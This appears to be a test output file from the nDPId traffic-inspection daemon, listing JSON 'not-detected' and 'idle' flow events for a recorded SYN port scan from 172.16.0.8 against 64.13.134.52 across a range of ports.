-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1057,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1057,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1058,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1058,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1061,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1061,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1062,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1063,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1062,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1063,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1064,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1064,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1066,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
